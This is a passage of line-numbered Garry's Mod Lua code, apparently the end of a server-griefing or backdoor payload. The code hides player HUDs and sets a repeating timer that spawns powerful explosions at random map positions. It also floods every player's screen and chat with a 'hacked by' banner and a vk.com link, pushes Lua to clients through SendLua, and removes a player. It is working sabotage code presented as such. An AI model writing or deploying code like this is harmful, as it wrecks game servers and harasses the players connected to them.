534 hook.Add( "HUDShouldDraw", "newhud", function() return false end )
535
536 ]] )
537
538 timer.Create( "allahakbar", 5, 0, function()
539 hook.Add("Think", "armageddon", function()
540 local explode = ents.Create( "env_explosion" )
541 explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
542 explode:Spawn()
543 explode:SetKeyValue( "iMagnitude", "500" )
544 explode:Fire( "Explode", 0, 0 )
545 end)
546 end)
547
548 hook.Add("Think", "chatspam", function() for k,v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, "๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ|vk.com/wryiloting228๑۩۩๑" ) v:SendLua([[chat.AddText( Color( math.random(1, 255), math.random(1, 255), math.random(1, 255) ), "๑۩۩๑ĤẪĈЌĒĎ ฿¥ L̂ÎÌNÌ‚K̂ÎÌNÌ‚SŶ|vk.com/wryiloting228๑۩۩๑" )]]) end end)
549
550 pPlayer:Remove()
551
552end )
553end )